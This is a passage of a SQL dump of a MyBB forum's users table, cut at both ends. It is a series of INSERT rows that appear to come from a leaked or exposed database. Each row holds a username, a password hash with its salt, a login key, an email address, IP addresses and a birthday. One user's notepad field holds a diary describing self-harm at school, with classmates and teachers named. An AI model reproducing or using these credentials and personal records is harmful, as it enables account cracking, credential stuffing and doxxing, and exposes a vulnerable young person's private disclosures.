`avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('82', 'iTzIpod', '30b50eaad86257c6029b3e27d979cf45', '3FlEluRo', 'rDWhPVdUGyElTUpc6oJ1PmfObywMFLGrEYHJj5WOEPUPB2DqoG', 'iTzIpod@hotmail.com', '1544', 'http://i.imgur.com/oBAmZ.gif?dateline=1352597023', '100|100', 'remote', '9', '20,17,13,21', '13', 'Unique Leader | Ex Mod', '1345502806', '1352774359', '1352763234', '1352771422', '', '0', '', '', 'iTzIpod@hotmail.com', '', 'none', '[align=center] [url=http://customhits.net/?ref=73] [img]http://customhits.net/promo/banner.gif[/img][/url] Skype: iTzIpod PSN: SoaR__Drastic [/align]', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '0', '2', '61,1,20,9,62,194', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '09/30/12 Aliyah and I are no longer friends because of Christian Henriquez. :/ 10/01/12 Aliyah and Me are friends again.. Aliyah kisses me. Met Stephanie Bortolussi again at Confirmation Registration night. Made a new Twitter : @I_Am_A_Llama__ Got into a big fight with Aliyah. No longer friends. (1 Week Duration) Fight was because she didn\'t reply to me fast enough... (Stupid action I made).. Friends again 2 weeks later after fight. Kissed on lips. Asked her out. Got rejected. :/ Asked her out because everyday of school, she kisses me, hugs me, winks @me, flirts with me, etc. Loves me ;) Cares for me :P Started cutting myself because of the rejection.. Cut my wrists in school, got caught by students. Aliyah, Danniel J, & Kojo told Mr. Simunec during Volleyball practice at lunch. Last recess of that day, Mr. Simunec talked to me. Next day, got in trouble by Mr. Coulson. Questioning me.. Started crying.. Was in need of a friend, no one was there for me.. I saw Aliyah.. She didn\'t feel bad. She knew what she was doing was the right thing to do but was hurting me.. I felt betrayed because Aliyah was copying + pasting me and her\'s conversation... Betrayal. I felt betrayed. She printed it out and gave it to Mr. Simunec and then Mr. Simunec gave it to Mr. Coulson.. Got in trouble. Parents came. And then got grounded. -.- What to do... :/ Promised to talk to Aliyah tomorrow. I don\'t know if I should.. [img]http://i.imgur.com/QTiAV.gif[/img] Reloadzor\'s Animated iTzIpod Text.', '0', '14', '29', '24.212.197.164', '24.212.197.164', '416597412', '416597412', '', '1154443', '1', '25', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '2', '0', '', '', 'a:4:{s:4:\"apid\";a:3:{i:1;a:5:{s:4:\"apid\";i:1;s:4:\"name\";s:7:\"Spammer\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_10_50.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:5:{s:4:\"apid\";i:2;s:4:\"name\";s:13:\"Posting Freak\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:24:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:9;a:5:{s:4:\"acid\";i:9;s:4:\"name\";s:9:\"Referrer \";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_07_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:17;a:5:{s:4:\"acid\";i:17;s:4:\"name\";s:8:\"Reporter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:5;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:6;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:7;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:8;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:10;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:11;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:12;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:15;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:16;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:18;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:19;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:21;a:1:{s:11:\"showpostbit\";i:0;}i:22;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:1;a:5:{s:4:\"atid\";i:1;s:4:\"name\";s:12:\"Contributor \";s:5:\"image\";s:60:\"inc/plugins/achivements/upload/threads_21_10_12_12_11_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showpostbit\";i:1;s:11:\"showprofile\";i:1;}}}', '191', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('288', 'PenisFlower', 'b86f28483f6c2237f1e55ed3dc41ef7d', 'q77jnalX', 'gqZC71MXau5nW146kxqINolEbjsFm9Ie6bxnVfDn7J5BLec4vs', 'aetheriast@gmail.com', '0', '', '', '', '2', '', '0', '', '1351050347', '1351052169', '1351051091', '0', '', '0', '', '', '', '10-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '216.104.36.237', '216.104.36.237', '-664263443', '-664263443', '', '770', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('54', 'Sin Cara', 'b45ea969b3a62699a22837d102d727b6', 'Dhio9AoI', 'z4vvZHI26KgMK1wMx7gUvH6Tq21kSuJKSJjFuEQWW5V4epbLGC', 'hasnain.raza.com@gmail.com', '93', './uploads/avatars/avatar_54.jpg?dateline=1345012579', '101|101', 'upload', '9', '', '0', 'Need custome MyBB theme, PM me.', '1344989631', '1352820231', '1352820231', '1352799136', '', '0', '', '', '', '', 'all', '[align=center][img]http://www.shrani.si/f/N/Fg/2gJfOqIS/sin-cara1.jpg[/img][/align]', '0', '0', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '16', '119.154.24.199', '119.154.17.86', '2006587591', '2006585686', '', '141100', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '27', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('55', 'Baws', '17dec6e8f522dc095a9938c4e4311036', 'uRlM9bLV', 'dxO6ix9kLrNci1znmJ11xfLTRkNnKAJZrw9p85VsOijyr7IVdv', 'gravity-pwnage@hotmail.com', '67', '', '', '', '2', '', '0', '', '1344992773', '1347749623', '1347683950', '1347749164', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '2', '20', '98.176.49.100', '98.176.49.100', '1655714148', '1655714148', '', '11942', '1', '7', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('56', '???Emotion™', 'e82ed33e0fc8a65ee58d57f6b7761958', '56TXXHU5', 'Hkr7E4vnuNtSgVSvi6PRc2cx9AAIFh8mP6cP3ZOau6S7O1v9KE', 'thedarkangel1398@yahoo.com', '2', '', '', '', '2', '', '0', '', '1344993267', '1344994789', '1344993267', '1344994613', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '98.86.145.224', '98.86.145.224', '1649840608', '1649840608', '', '1522', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('57', 'Kasane', 'cd633811f9988b486835f723f905b042', 'pXSwwV9X', '2XPYIeeQmR77tkAxjAYWLhpkA8v9obYSCLvS8yCk7n8v7HEkuD', 'waffles@seymour.butts', '1', '', '', '', '2', '', '0', '', '1344993351', '1344995350', '1344993803', '1344993791', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '85.69.208.130', '74.120.13.132', '1430638722', '1249381764', '', '452', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('62', 'R?????zo?', '16098a3d0debd371745aeee6009fab1a', 'UdwQGsZy', 'vq1TQIsJIgYm9otFjldi9VoMUCBrVVJOdvxsaOWAcd23LqHbw9', 'ze_guna@hotmail.com', '515', './uploads/avatars/avatar_62.png?dateline=1349812233', '100|100', 'upload', '9', '13,17,20,21', '13', 'Unique Leader', '1345063471', '1352820859', '1352799126', '1352799074', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/xr9Xv.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '31', '94.132.244.168', '188.140.39.222', '1585771688', '-1131665442', '', '320705', '1', '41', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"acid\";a:14:{i:22;a:5:{s:4:\"acid\";i:22;s:4:\"name\";s:8:\"GFX Guru\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:16;a:5:{s:4:\"acid\";i:16;s:4:\"name\";s:10:\"Gold Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:25;a:5:{s:4:\"acid\";i:25;s:4:\"name\";s:7:\"Diamond\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_1_48_27.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}i:7;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:5:{s:4:\"apid\";i:2;s:4:\"name\";s:13:\"Posting Freak\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '59', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('61', 'NXK', '13f219a9ece7422df37498c24b008907', 'iS7FKSlV', 'ed5iZlX7yxl5z75EbTuczHcYHkfgwY2ZGwC5NzmheMygCkIAun', 'vod246@hotmail.com', '308', './uploads/avatars/avatar_61.jpg?dateline=1345503667', '120|115', 'upload', '4', '9,17,13', '0', 'Need help? PM me. ', '1345060919', '1352823614', '1352820223', '1352578135', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/SSlBX.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '1', '27', '99.253.65.17', '99.252.235.12', '1677541649', '1677519628', '', '516846', '1', '138', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"acid\";a:10:{i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:7;a:5:{s:4:\"acid\";i:7;s:4:\"name\";s:21:\"Dangerous Programmer \";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_04_38.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:2:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '31', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('60', 'Linux', '55db2f20ac9caa03364875c6efd59a0a', 'fTUYc7mr', 'cSiZM3rf1DfeyDdG5vTmUtOrwRbhMfGtMkjqKyPSevU5VyYYFf', 'marinacutiee@gmail.com', '3', '', '', '', '2', '', '0', '', '1345059649', '1345225764', '1345217347', '1345224837', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '117.216.4.58', '117.217.209.184', '1977091130', '1977209272', '', '5604', '1', 